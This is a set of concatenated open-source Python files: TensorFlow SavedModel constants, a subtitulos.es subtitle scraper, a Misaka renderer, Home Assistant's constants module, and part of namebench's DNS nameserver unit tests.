"saved_model.VARIABLES_DIRECTORY",
v1=[
"saved_model.VARIABLES_DIRECTORY",
"saved_model.constants.VARIABLES_DIRECTORY"
]).export_constant(__name__, "VARIABLES_DIRECTORY")
# File name used for variables.
VARIABLES_FILENAME = "variables"
tf_export(
"saved_model.VARIABLES_FILENAME",
v1=[
"saved_model.VARIABLES_FILENAME",
"saved_model.constants.VARIABLES_FILENAME"
]).export_constant(__name__, "VARIABLES_FILENAME")
# The initialization and train ops for a MetaGraph are stored in the
# signature def map. The ops are added to the map with the following keys.
INIT_OP_SIGNATURE_KEY = "__saved_model_init_op"
TRAIN_OP_SIGNATURE_KEY = "__saved_model_train_op"
|
apache-2.0
|
josemartin/TVshowDownloader
|
subService.py
|
1
|
13451
|
# -*- coding: utf-8 -*-
# based on argenteam.net subtitles, based on a mod of Subdivx.com subtitles, based on a mod of Undertext subtitles
# developed by quillo86 and infinito for Subtitulos.es and XBMC.org
# little fixes and updates by tux_os
#
# Adaptation for tv show downloader by J. Martin
#
import os, sys, re, string, time, urllib, urllib2
main_url = "http://www.subtitulos.es/"
debug_pretext = "subtitulos.es"
#====================================================================================================================
# Regular expression patterns
#====================================================================================================================
subtitle_pattern1 = "<div id=\"version\" class=\"ssdiv\">(.+?)Versión(.+?)<span class=\"right traduccion\">(.+?)</div>(.+?)</div>"
subtitle_pattern2 = "<li class='li-idioma'>(.+?)<strong>(.+?)</strong>(.+?)<li class='li-estado (.+?)</li>(.+?)<span class='descargar (.+?)</span>"
#====================================================================================================================
# Functions
#====================================================================================================================
def getallsubs(languageshort, langlong, file_original_path, subtitles_list, tvshow, season, episode):
if re.search(r'\([^)]*\)', tvshow):
for level in range(4):
searchstring, tvshow, season, episode = getsearchstring(tvshow, season, episode, level)
url = main_url + searchstring.lower()
getallsubsforurl(url, languageshort, langlong, file_original_path, subtitles_list, tvshow, season, episode)
else:
searchstring, tvshow, season, episode = getsearchstring(tvshow, season, episode, 0)
url = main_url + searchstring.lower()
getallsubsforurl(url, languageshort, langlong, file_original_path, subtitles_list, tvshow, season, episode)
def getallsubsforurl(url, languageshort, langlong, file_original_path, subtitles_list, tvshow, season, episode):
content = geturl(url)
for matches in re.finditer(subtitle_pattern1, content, re.IGNORECASE | re.DOTALL | re.MULTILINE | re.UNICODE):
filename = urllib.unquote_plus(matches.group(2))
filename = string.join(filename.split()[:-2])
filename = re.sub(r' ', '.', filename)
filename = re.sub(r'\s', '.', tvshow) + "." + season + "x" + episode + "." + filename
server = filename
backup = filename
subs = matches.group(4)
for matches in re.finditer(subtitle_pattern2, subs, re.IGNORECASE | re.DOTALL | re.MULTILINE | re.UNICODE):
#log( __name__ ,"Descargas: %s" % (matches.group(2)))
idioma = matches.group(2)
idioma = re.sub(r'\xc3\xb1', 'n', idioma)
idioma = re.sub(r'\xc3\xa0', 'a', idioma)
idioma = re.sub(r'\xc3\xa9', 'e', idioma)
if idioma == "English":
languageshort = "en"
languagelong = "English"
filename = filename + ".(ENGLISH)"
server = filename
elif idioma == "Catala":
languageshort = "ca"
languagelong = "Catalan"
filename = filename + ".(CATALA)"
server = filename
elif idioma == "Espanol (Latinoamerica)":
languageshort = "es"
languagelong = "Spanish"
filename = filename + ".(LATINO)"
server = filename
elif idioma == "Galego":
languageshort = "es"
languagelong = "Spanish"
filename = filename + ".(GALEGO)"
server = filename
else:
languageshort = "es"
languagelong = "Spanish"
filename = filename + ".(ESPAÑA)"
server = filename
estado = matches.group(4)
estado = re.sub(r'\t', '', estado)
estado = re.sub(r'\n', '', estado)
id = matches.group(6)
id = re.sub(r'([^-]*)href="', '', id)
id = re.sub(r'" rel([^-]*)', '', id)
id = re.sub(r'" re([^-]*)', '', id)
id = re.sub(r'http://www.subtitulos.es/', '', id)
if estado.strip() == "green'>Completado".strip() and languagelong == langlong:
subtitles_list.append({'rating': "0", 'no_files': 1, 'filename': filename, 'server': server, 'sync': False, 'id' : id, 'language_flag': 'flags/' + languageshort + '.gif', 'language_name': languagelong})
filename = backup
server = backup
def geturl(url):
class AppURLopener(urllib.FancyURLopener):
version = "App/1.7"
def __init__(self, *args):
urllib.FancyURLopener.__init__(self, *args)
def add_referrer(self, url=None):
if url:
urllib._urlopener.addheader('Referer', url)
urllib._urlopener = AppURLopener()
urllib._urlopener.add_referrer("http://www.subtitulos.es/")
try:
response = urllib._urlopener.open(url)
content = response.read()
except:
#log( __name__ ,"%s Failed to get url:%s" % (debug_pretext, url))
content = None
return content
def getsearchstring(tvshow, season, episode, level):
# Clean tv show name
if level == 1 and re.search(r'\([^)][a-zA-Z]*\)', tvshow):
# Series name like "Shameless (US)" -> "Shameless US"
tvshow = tvshow.replace('(', '').replace(')', '')
if level == 2 and re.search(r'\([^)][0-9]*\)', tvshow):
# Series name like "Scandal (2012)" -> "Scandal"
tvshow = re.sub(r'\s\([^)]*\)', '', tvshow)
if level == 3 and re.search(r'\([^)]*\)', tvshow):
# Series name like "Shameless (*)" -> "Shameless"
tvshow = re.sub(r'\s\([^)]*\)', '', tvshow)
# Zero pad episode
episode = str(episode).rjust(2, '0')
# Build search string
searchstring = tvshow + '/' + season + 'x' + episode
# Replace spaces with dashes
searchstring = re.sub(r'\s', '-', searchstring)
#log( __name__ ,"%s Search string = %s" % (debug_pretext, searchstring))
return searchstring, tvshow, season, episode
def clean_subtitles_list(subtitles_list):
seen = set()
subs = []
for sub in subtitles_list:
filename = sub['filename']
#log(__name__, "Filename: %s" % filename)
if filename not in seen:
subs.append(sub)
seen.add(filename)
return subs
def search_subtitles( file_original_path, title, tvshow, year, season, episode, set_temp, rar, lang1, lang2, lang3, stack ): #standard input
subtitles_list = []
msg = ""
if len(tvshow) == 0:
msg = "Subtitulos.es is only for TV Shows subtitles!"
if lang1 == "Spanish":
languagelong = "Spanish"
languageshort = "es"
getallsubs("es", "Spanish", file_original_path, subtitles_list, tvshow, season, episode)
elif lang1 == "English":
languagelong = "English"
languageshort = "en"
getallsubs("en", "English", file_original_path, subtitles_list, tvshow, season, episode)
elif lang1 == "Catalan":
languagelong = "Catalan"
languageshort = "ca"
getallsubs("ca", "Catalan", file_original_path, subtitles_list, tvshow, season, episode)
if lang2 == "Spanish" and lang1 != "Spanish":
languagelong = "Spanish"
languageshort = "es"
getallsubs("es", "Spanish", file_original_path, subtitles_list, tvshow, season, episode)
elif lang2 == "English" and lang1 != "English":
languagelong = "English"
languageshort = "en"
getallsubs("en", "English", file_original_path, subtitles_list, tvshow, season, episode)
elif lang2 == "Catalan" and lang1 != "Catalan":
languagelong = "Catalan"
languageshort = "ca"
getallsubs("ca", "Catalan", file_original_path, subtitles_list, tvshow, season, episode)
if lang3 == "Spanish" and lang1 != "Spanish" and lang2 != "Spanish":
languagelong = "Spanish"
languageshort = "es"
getallsubs("es", "Spanish", file_original_path, subtitles_list, tvshow, season, episode)
elif lang3 == "English" and lang1 != "English" and lang2 != "English":
languagelong = "English"
languageshort = "en"
getallsubs("en", "English", file_original_path, subtitles_list, tvshow, season, episode)
elif lang3 == "Catalan" and lang1 != "Catalan" and lang2 != "Catalan":
languagelong = "Catalan"
languageshort = "ca"
getallsubs("ca", "Catalan", file_original_path, subtitles_list, tvshow, season, episode)
if ((lang1 != "Spanish") and (lang2 != "English") and (lang3 != "Catalan")):
msg = "Won't work, subtitulos.es is only for Spanish, English and Catalan subtitles!"
subtitles_list = clean_subtitles_list(subtitles_list)
return subtitles_list, "", msg #standard output
def download_subtitles (subtitles_list, pos, zip_subs, tmp_sub_dir, sub_folder, session_id): #standard input
id = subtitles_list[pos][ "id" ]
server = subtitles_list[pos][ "server" ]
language = subtitles_list[pos][ "language_name" ]
srtfile = subtitles_list[pos][ "filename" ] + ".srt"
url = "http://www.subtitulos.es/" + id
content = geturl(url)
if content is not None:
header = content[:4]
local_tmp_file = os.path.join(tmp_sub_dir, srtfile) # assume unpacked sub file is an '.srt'
subs_file = local_tmp_file
packed = False
#print "%s Saving subtitles to '%s'" % (debug_pretext, local_tmp_file)
try:
#log( __name__ ,"%s argenteam: escribo en %s" % (debug_pretext, local_tmp_file)) #EGO
local_file_handle = open(local_tmp_file, "wb")
local_file_handle.write(content)
local_file_handle.close()
except:
pass
#log( __name__ ,"%s Failed to save subtitles to '%s'" % (debug_pretext, local_tmp_file))
if packed:
files = os.listdir(tmp_sub_dir)
init_filecount = len(files)
#log( __name__ ,"%s argenteam: número de init_filecount %s" % (debug_pretext, init_filecount)) #EGO
filecount = init_filecount
max_mtime = 0
# determine the newest file from tmp_sub_dir
for file in files:
if (string.split(file,'.')[-1] in ['srt','sub','txt']):
mtime = os.stat(os.path.join(tmp_sub_dir, file)).st_mtime
if mtime > max_mtime:
max_mtime = mtime
init_max_mtime = max_mtime
time.sleep(2) # wait 2 seconds so that the unpacked files are at least 1 second newer
xbmc.executebuiltin("XBMC.Extract(" + local_tmp_file + "," + tmp_sub_dir +")")
waittime = 0
while (filecount == init_filecount) and (waittime < 20) and (init_max_mtime == max_mtime): # nothing yet extracted
time.sleep(1) # wait 1 second to let the builtin function 'XBMC.extract' unpack
files = os.listdir(tmp_sub_dir)
filecount = len(files)
# determine if there is a newer file created in tmp_sub_dir (marks that the extraction had completed)
for file in files:
if (string.split(file,'.')[-1] in ['srt','sub','txt']):
mtime = os.stat(os.path.join(tmp_sub_dir, file)).st_mtime
if (mtime > max_mtime):
max_mtime = mtime
waittime = waittime + 1
if waittime == 20:
print "%s Failed to unpack subtitles in '%s'" % (debug_pretext, tmp_sub_dir)
else:
print "%s Unpacked files in '%s'" % (debug_pretext, tmp_sub_dir)
for file in files:
# there could be more subtitle files in tmp_sub_dir, so make sure we get the newly created subtitle file
if (string.split(file, '.')[-1] in ['srt', 'sub', 'txt']) and (os.stat(os.path.join(tmp_sub_dir, file)).st_mtime > init_max_mtime): # unpacked file is a newly created subtitle file
print "%s Unpacked subtitles file '%s'" % (debug_pretext, file)
subs_file = os.path.join(tmp_sub_dir, file)
return False, language, subs_file #standard output
|
gpl-3.0
|
stsouko/MWUI
|
vk_update/VKUpdate/misaka.py
|
1
|
1044
|
# -*- coding: utf-8 -*-
#
# Copyright 2019 Ramil Nugmanov <[email protected]>
# This file is part of CIpress.
#
# CIpress is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program; if not, see <https://www.gnu.org/licenses/>.
#
from misaka import HtmlRenderer
class MisakaRenderer(HtmlRenderer):
def table(self, content):
return f'<table class="table">{content}</table>'
def paragraph(self, content):
return f'<p class="para">{content}</p>'
__all__ = ['MisakaRenderer']
|
agpl-3.0
|
MungoRae/home-assistant
|
homeassistant/const.py
|
1
|
12851
|
# coding: utf-8
"""Constants used by Home Assistant components."""
MAJOR_VERSION = 0
MINOR_VERSION = 52
PATCH_VERSION = '0.dev0'
__short_version__ = '{}.{}'.format(MAJOR_VERSION, MINOR_VERSION)
__version__ = '{}.{}'.format(__short_version__, PATCH_VERSION)
REQUIRED_PYTHON_VER = (3, 4, 2)
REQUIRED_PYTHON_VER_WIN = (3, 5, 2)
CONSTRAINT_FILE = 'package_constraints.txt'
PROJECT_NAME = 'Home Assistant'
PROJECT_PACKAGE_NAME = 'homeassistant'
PROJECT_LICENSE = 'Apache License 2.0'
PROJECT_AUTHOR = 'The Home Assistant Authors'
PROJECT_COPYRIGHT = ' 2013, {}'.format(PROJECT_AUTHOR)
PROJECT_URL = 'https://home-assistant.io/'
PROJECT_EMAIL = '[email protected]'
PROJECT_DESCRIPTION = ('Open-source home automation platform '
'running on Python 3.')
PROJECT_LONG_DESCRIPTION = ('Home Assistant is an open-source '
'home automation platform running on Python 3. '
'Track and control all devices at home and '
'automate control. '
'Installation in less than a minute.')
PROJECT_CLASSIFIERS = [
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.4',
'Topic :: Home Automation'
]
PROJECT_GITHUB_USERNAME = 'home-assistant'
PROJECT_GITHUB_REPOSITORY = 'home-assistant'
PYPI_URL = 'https://pypi.python.org/pypi/{}'.format(PROJECT_PACKAGE_NAME)
GITHUB_PATH = '{}/{}'.format(PROJECT_GITHUB_USERNAME,
PROJECT_GITHUB_REPOSITORY)
GITHUB_URL = 'https://github.com/{}'.format(GITHUB_PATH)
PLATFORM_FORMAT = '{}.{}'
# Can be used to specify a catch all when registering state or event listeners.
MATCH_ALL = '*'
# If no name is specified
DEVICE_DEFAULT_NAME = 'Unnamed Device'
WEEKDAYS = ['mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun']
SUN_EVENT_SUNSET = 'sunset'
SUN_EVENT_SUNRISE = 'sunrise'
# #### CONFIG ####
CONF_ABOVE = 'above'
CONF_ACCESS_TOKEN = 'access_token'
CONF_ADDRESS = 'address'
CONF_AFTER = 'after'
CONF_ALIAS = 'alias'
CONF_API_KEY = 'api_key'
CONF_AT = 'at'
CONF_AUTHENTICATION = 'authentication'
CONF_BASE = 'base'
CONF_BEFORE = 'before'
CONF_BELOW = 'below'
CONF_BINARY_SENSORS = 'binary_sensors'
CONF_BLACKLIST = 'blacklist'
CONF_BRIGHTNESS = 'brightness'
CONF_CODE = 'code'
CONF_COLOR_TEMP = 'color_temp'
CONF_COMMAND = 'command'
CONF_COMMAND_CLOSE = 'command_close'
CONF_COMMAND_OFF = 'command_off'
CONF_COMMAND_ON = 'command_on'
CONF_COMMAND_OPEN = 'command_open'
CONF_COMMAND_STATE = 'command_state'
CONF_COMMAND_STOP = 'command_stop'
CONF_CONDITION = 'condition'
CONF_COVERS = 'covers'
CONF_CURRENCY = 'currency'
CONF_CUSTOMIZE = 'customize'
CONF_CUSTOMIZE_DOMAIN = 'customize_domain'
CONF_CUSTOMIZE_GLOB = 'customize_glob'
CONF_DEVICE = 'device'
CONF_DEVICE_CLASS = 'device_class'
CONF_DEVICES = 'devices'
CONF_DISARM_AFTER_TRIGGER = 'disarm_after_trigger'
CONF_DISCOVERY = 'discovery'
CONF_DISPLAY_OPTIONS = 'display_options'
CONF_DOMAIN = 'domain'
CONF_DOMAINS = 'domains'
CONF_EFFECT = 'effect'
CONF_ELEVATION = 'elevation'
CONF_EMAIL = 'email'
CONF_ENTITIES = 'entities'
CONF_ENTITY_ID = 'entity_id'
CONF_ENTITY_NAMESPACE = 'entity_namespace'
CONF_EVENT = 'event'
CONF_EXCLUDE = 'exclude'
CONF_FILE_PATH = 'file_path'
CONF_FILENAME = 'filename'
CONF_FRIENDLY_NAME = 'friendly_name'
CONF_HEADERS = 'headers'
CONF_HOST = 'host'
CONF_HOSTS = 'hosts'
CONF_ICON = 'icon'
CONF_ICON_TEMPLATE = 'icon_template'
CONF_INCLUDE = 'include'
CONF_ID = 'id'
CONF_IP_ADDRESS = 'ip_address'
CONF_LATITUDE = 'latitude'
CONF_LONGITUDE = 'longitude'
CONF_MAC = 'mac'
CONF_METHOD = 'method'
CONF_MINIMUM = 'minimum'
CONF_MAXIMUM = 'maximum'
CONF_MONITORED_CONDITIONS = 'monitored_conditions'
CONF_MONITORED_VARIABLES = 'monitored_variables'
CONF_NAME = 'name'
CONF_OFFSET = 'offset'
CONF_OPTIMISTIC = 'optimistic'
CONF_PACKAGES = 'packages'
CONF_PASSWORD = 'password'
CONF_PATH = 'path'
CONF_PAYLOAD = 'payload'
CONF_PAYLOAD_OFF = 'payload_off'
CONF_PAYLOAD_ON = 'payload_on'
CONF_PENDING_TIME = 'pending_time'
CONF_PIN = 'pin'
CONF_PLATFORM = 'platform'
CONF_PORT = 'port'
CONF_PREFIX = 'prefix'
CONF_PROTOCOL = 'protocol'
CONF_PROXY_SSL = 'proxy_ssl'
CONF_QUOTE = 'quote'
CONF_RECIPIENT = 'recipient'
CONF_RESOURCE = 'resource'
CONF_RESOURCES = 'resources'
CONF_RGB = 'rgb'
CONF_SCAN_INTERVAL = 'scan_interval'
CONF_SENDER = 'sender'
CONF_SENSOR_TYPE = 'sensor_type'
CONF_SENSORS = 'sensors'
CONF_SLAVE = 'slave'
CONF_SSL = 'ssl'
CONF_STATE = 'state'
CONF_STRUCTURE = 'structure'
CONF_SWITCHES = 'switches'
CONF_TEMPERATURE_UNIT = 'temperature_unit'
CONF_TIME_ZONE = 'time_zone'
CONF_TIMEOUT = 'timeout'
CONF_TOKEN = 'token'
CONF_TRIGGER_TIME = 'trigger_time'
CONF_TYPE = 'type'
CONF_UNIT_OF_MEASUREMENT = 'unit_of_measurement'
CONF_UNIT_SYSTEM = 'unit_system'
CONF_URL = 'url'
CONF_USERNAME = 'username'
CONF_VALUE_TEMPLATE = 'value_template'
CONF_VERIFY_SSL = 'verify_ssl'
CONF_WEEKDAY = 'weekday'
CONF_WHITELIST = 'whitelist'
CONF_WHITELIST_EXTERNAL_DIRS = 'whitelist_external_dirs'
CONF_WHITE_VALUE = 'white_value'
CONF_XY = 'xy'
CONF_ZONE = 'zone'
# #### EVENTS ####
EVENT_HOMEASSISTANT_START = 'homeassistant_start'
EVENT_HOMEASSISTANT_STOP = 'homeassistant_stop'
EVENT_HOMEASSISTANT_CLOSE = 'homeassistant_close'
EVENT_STATE_CHANGED = 'state_changed'
EVENT_TIME_CHANGED = 'time_changed'
EVENT_CALL_SERVICE = 'call_service'
EVENT_SERVICE_EXECUTED = 'service_executed'
EVENT_PLATFORM_DISCOVERED = 'platform_discovered'
EVENT_COMPONENT_LOADED = 'component_loaded'
EVENT_SERVICE_REGISTERED = 'service_registered'
EVENT_SERVICE_REMOVED = 'service_removed'
EVENT_LOGBOOK_ENTRY = 'logbook_entry'
EVENT_THEMES_UPDATED = 'themes_updated'
# #### STATES ####
STATE_ON = 'on'
STATE_OFF = 'off'
STATE_HOME = 'home'
STATE_NOT_HOME = 'not_home'
STATE_UNKNOWN = 'unknown'
STATE_OPEN = 'open'
STATE_OPENING = 'opening'
STATE_CLOSED = 'closed'
STATE_CLOSING = 'closing'
STATE_PLAYING = 'playing'
STATE_PAUSED = 'paused'
STATE_IDLE = 'idle'
STATE_STANDBY = 'standby'
STATE_ALARM_DISARMED = 'disarmed'
STATE_ALARM_ARMED_HOME = 'armed_home'
STATE_ALARM_ARMED_AWAY = 'armed_away'
STATE_ALARM_ARMED_NIGHT = 'armed_night'
STATE_ALARM_PENDING = 'pending'
STATE_ALARM_ARMING = 'arming'
STATE_ALARM_DISARMING = 'disarming'
STATE_ALARM_TRIGGERED = 'triggered'
STATE_LOCKED = 'locked'
STATE_UNLOCKED = 'unlocked'
STATE_UNAVAILABLE = 'unavailable'
STATE_OK = 'ok'
STATE_PROBLEM = 'problem'
# #### STATE AND EVENT ATTRIBUTES ####
# Attribution
ATTR_ATTRIBUTION = 'attribution'
# Contains time-related attributes
ATTR_NOW = 'now'
ATTR_DATE = 'date'
ATTR_TIME = 'time'
# Contains domain, service for a SERVICE_CALL event
ATTR_DOMAIN = 'domain'
ATTR_SERVICE = 'service'
ATTR_SERVICE_DATA = 'service_data'
# Data for a SERVICE_EXECUTED event
ATTR_SERVICE_CALL_ID = 'service_call_id'
# Contains one string or a list of strings, each being an entity id
ATTR_ENTITY_ID = 'entity_id'
# String with a friendly name for the entity
ATTR_FRIENDLY_NAME = 'friendly_name'
# A picture to represent entity
ATTR_ENTITY_PICTURE = 'entity_picture'
# Icon to use in the frontend
ATTR_ICON = 'icon'
# The unit of measurement if applicable
ATTR_UNIT_OF_MEASUREMENT = 'unit_of_measurement'
CONF_UNIT_SYSTEM_METRIC = 'metric' # type: str
CONF_UNIT_SYSTEM_IMPERIAL = 'imperial' # type: str
# Temperature attribute
ATTR_TEMPERATURE = 'temperature'
TEMP_CELSIUS = '°C'
TEMP_FAHRENHEIT = '°F'
# Length units
LENGTH_CENTIMETERS = 'cm' # type: str
LENGTH_METERS = 'm' # type: str
LENGTH_KILOMETERS = 'km' # type: str
LENGTH_INCHES = 'in' # type: str
LENGTH_FEET = 'ft' # type: str
LENGTH_YARD = 'yd' # type: str
LENGTH_MILES = 'mi' # type: str
# Volume units
VOLUME_LITERS = 'L' # type: str
VOLUME_MILLILITERS = 'mL' # type: str
VOLUME_GALLONS = 'gal' # type: str
VOLUME_FLUID_OUNCE = 'fl. oz.' # type: str
# Mass units
MASS_GRAMS = 'g' # type: str
MASS_KILOGRAMS = 'kg' # type: str
MASS_OUNCES = 'oz' # type: str
MASS_POUNDS = 'lb' # type: str
# Contains the information that is discovered
ATTR_DISCOVERED = 'discovered'
# Location of the device/sensor
ATTR_LOCATION = 'location'
ATTR_BATTERY_LEVEL = 'battery_level'
ATTR_WAKEUP = 'wake_up_interval'
# For devices which support a code attribute
ATTR_CODE = 'code'
ATTR_CODE_FORMAT = 'code_format'
# For calling a device specific command
ATTR_COMMAND = 'command'
# For devices which support an armed state
ATTR_ARMED = 'device_armed'
# For devices which support a locked state
ATTR_LOCKED = 'locked'
# For sensors that support 'tripping', eg. motion and door sensors
ATTR_TRIPPED = 'device_tripped'
# For sensors that support 'tripping' this holds the most recent
# time the device was tripped
ATTR_LAST_TRIP_TIME = 'last_tripped_time'
# For all entity's, this hold whether or not it should be hidden
ATTR_HIDDEN = 'hidden'
# Location of the entity
ATTR_LATITUDE = 'latitude'
ATTR_LONGITUDE = 'longitude'
# Accuracy of location in meters
ATTR_GPS_ACCURACY = 'gps_accuracy'
# If state is assumed
ATTR_ASSUMED_STATE = 'assumed_state'
ATTR_STATE = 'state'
ATTR_OPTION = 'option'
# Bitfield of supported component features for the entity
ATTR_SUPPORTED_FEATURES = 'supported_features'
# Class of device within its domain
ATTR_DEVICE_CLASS = 'device_class'
# #### SERVICES ####
SERVICE_HOMEASSISTANT_STOP = 'stop'
SERVICE_HOMEASSISTANT_RESTART = 'restart'
SERVICE_TURN_ON = 'turn_on'
SERVICE_TURN_OFF = 'turn_off'
SERVICE_TOGGLE = 'toggle'
SERVICE_RELOAD = 'reload'
SERVICE_VOLUME_UP = 'volume_up'
SERVICE_VOLUME_DOWN = 'volume_down'
SERVICE_VOLUME_MUTE = 'volume_mute'
SERVICE_VOLUME_SET = 'volume_set'
SERVICE_MEDIA_PLAY_PAUSE = 'media_play_pause'
SERVICE_MEDIA_PLAY = 'media_play'
SERVICE_MEDIA_PAUSE = 'media_pause'
SERVICE_MEDIA_STOP = 'media_stop'
SERVICE_MEDIA_NEXT_TRACK = 'media_next_track'
SERVICE_MEDIA_PREVIOUS_TRACK = 'media_previous_track'
SERVICE_MEDIA_SEEK = 'media_seek'
SERVICE_SHUFFLE_SET = 'shuffle_set'
SERVICE_ALARM_DISARM = 'alarm_disarm'
SERVICE_ALARM_ARM_HOME = 'alarm_arm_home'
SERVICE_ALARM_ARM_AWAY = 'alarm_arm_away'
SERVICE_ALARM_ARM_NIGHT = 'alarm_arm_night'
SERVICE_ALARM_TRIGGER = 'alarm_trigger'
SERVICE_LOCK = 'lock'
SERVICE_UNLOCK = 'unlock'
SERVICE_OPEN = 'open'
SERVICE_CLOSE = 'close'
SERVICE_CLOSE_COVER = 'close_cover'
SERVICE_CLOSE_COVER_TILT = 'close_cover_tilt'
SERVICE_OPEN_COVER = 'open_cover'
SERVICE_OPEN_COVER_TILT = 'open_cover_tilt'
SERVICE_SET_COVER_POSITION = 'set_cover_position'
SERVICE_SET_COVER_TILT_POSITION = 'set_cover_tilt_position'
SERVICE_STOP_COVER = 'stop_cover'
SERVICE_STOP_COVER_TILT = 'stop_cover_tilt'
SERVICE_SELECT_OPTION = 'select_option'
# #### API / REMOTE ####
SERVER_PORT = 8123
URL_ROOT = '/'
URL_API = '/api/'
URL_API_STREAM = '/api/stream'
URL_API_CONFIG = '/api/config'
URL_API_DISCOVERY_INFO = '/api/discovery_info'
URL_API_STATES = '/api/states'
URL_API_STATES_ENTITY = '/api/states/{}'
URL_API_EVENTS = '/api/events'
URL_API_EVENTS_EVENT = '/api/events/{}'
URL_API_SERVICES = '/api/services'
URL_API_SERVICES_SERVICE = '/api/services/{}/{}'
URL_API_COMPONENTS = '/api/components'
URL_API_ERROR_LOG = '/api/error_log'
URL_API_LOG_OUT = '/api/log_out'
URL_API_TEMPLATE = '/api/template'
HTTP_OK = 200
HTTP_CREATED = 201
HTTP_MOVED_PERMANENTLY = 301
HTTP_BAD_REQUEST = 400
HTTP_UNAUTHORIZED = 401
HTTP_NOT_FOUND = 404
HTTP_METHOD_NOT_ALLOWED = 405
HTTP_UNPROCESSABLE_ENTITY = 422
HTTP_INTERNAL_SERVER_ERROR = 500
HTTP_BASIC_AUTHENTICATION = 'basic'
HTTP_DIGEST_AUTHENTICATION = 'digest'
HTTP_HEADER_HA_AUTH = 'X-HA-access'
HTTP_HEADER_ACCEPT_ENCODING = 'Accept-Encoding'
HTTP_HEADER_CONTENT_TYPE = 'Content-type'
HTTP_HEADER_CONTENT_ENCODING = 'Content-Encoding'
HTTP_HEADER_VARY = 'Vary'
HTTP_HEADER_CONTENT_LENGTH = 'Content-Length'
HTTP_HEADER_CACHE_CONTROL = 'Cache-Control'
HTTP_HEADER_EXPIRES = 'Expires'
HTTP_HEADER_ORIGIN = 'Origin'
HTTP_HEADER_X_REQUESTED_WITH = 'X-Requested-With'
HTTP_HEADER_ACCEPT = 'Accept'
HTTP_HEADER_ACCESS_CONTROL_ALLOW_ORIGIN = 'Access-Control-Allow-Origin'
HTTP_HEADER_ACCESS_CONTROL_ALLOW_HEADERS = 'Access-Control-Allow-Headers'
ALLOWED_CORS_HEADERS = [HTTP_HEADER_ORIGIN, HTTP_HEADER_ACCEPT,
HTTP_HEADER_X_REQUESTED_WITH, HTTP_HEADER_CONTENT_TYPE,
HTTP_HEADER_HA_AUTH]
CONTENT_TYPE_JSON = 'application/json'
CONTENT_TYPE_MULTIPART = 'multipart/x-mixed-replace; boundary={}'
CONTENT_TYPE_TEXT_PLAIN = 'text/plain'
# The exit code to send to request a restart
RESTART_EXIT_CODE = 100
UNIT_NOT_RECOGNIZED_TEMPLATE = '{} is not a recognized {} unit.' # type: str
LENGTH = 'length' # type: str
MASS = 'mass' # type: str
VOLUME = 'volume' # type: str
TEMPERATURE = 'temperature' # type: str
SPEED_MS = 'speed_ms' # type: str
ILLUMINANCE = 'illuminance' # type: str
|
apache-2.0
|
when30/namebench
|
libnamebench/nameserver_test.py
|
175
|
7015
|
#!/usr/bin/env python
# Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Mocks for tests."""
__author__ = '[email protected] (Thomas Stromberg)'
import mocks
import nameserver
import unittest
class TestNameserver(unittest.TestCase):
def testInit(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
self.assertEquals(ns.ip, mocks.GOOD_IP)
self.assertEquals(ns.name, None)
ns = mocks.MockNameServer(mocks.NO_RESPONSE_IP, name='Broked')
self.assertEquals(ns.ip, mocks.NO_RESPONSE_IP)
self.assertEquals(ns.name, 'Broked')
def testTimedRequest(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
(response, duration, exception) = ns.TimedRequest('A', 'www.paypal.com')
self.assertEquals(response.id, 999)
expected = ('www.paypal.com. 159 IN A 66.211.169.65\n'
'www.paypal.com. 159 IN A 66.211.169.2')
self.assertEquals(str(response.answer[0]), expected)
self.assertTrue(duration > 0)
self.assertEquals(exception, None)
def testTestAnswers(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
(is_broken, warning, duration) = ns.TestAnswers('A', 'www.paypal.com',
'10.0.0.1')
self.assertEquals(is_broken, False)
self.assertEquals(warning, None)
self.assertTrue(duration > 0 and duration < 3600)
def testResponseToAscii(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
(response, duration, exception) = ns.TimedRequest('A', 'www.paypal.com')
self.assertEquals(nameserver.ResponseToAscii(response),
'66.211.169.65 + 66.211.169.2')
response.answer = None
self.assertEquals(nameserver.ResponseToAscii(response), 'no answer')
def testGoogleComResponse(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
(is_broken, warning, duration) = ns.TestGoogleComResponse()
self.assertEquals(is_broken, False)
self.assertEquals(warning,
'google.com. is hijacked (66.211.169.65 + 66.211.169.2)')
self.assertTrue(duration > 0 and duration < 3600)
def testWwwGoogleComResponse(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
(is_broken, warning, duration) = ns.TestWwwGoogleComResponse()
self.assertEquals(is_broken, True)
self.assertEquals(warning, 'No answer')
self.assertTrue(duration > 0 and duration < 3600)
def testWwwPaypalComResponse(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
(is_broken, warning, duration) = ns.TestWwwPaypalComResponse()
self.assertEquals(is_broken, False)
self.assertEquals(warning, None)
def testNegativeResponse(self):
ns = mocks.MockNameServer(mocks.NO_RESPONSE_IP)
(is_broken, warning, duration) = ns.TestNegativeResponse()
self.assertEquals(is_broken, False)
self.assertEquals(warning, None)
def testNegativeResponseHijacked(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
(is_broken, warning, duration) = ns.TestNegativeResponse()
self.assertEquals(is_broken, False)
self.assertEquals(warning,
'NXDOMAIN Hijacking (66.211.169.65 + 66.211.169.2)')
def testNegativeResponseBroken(self):
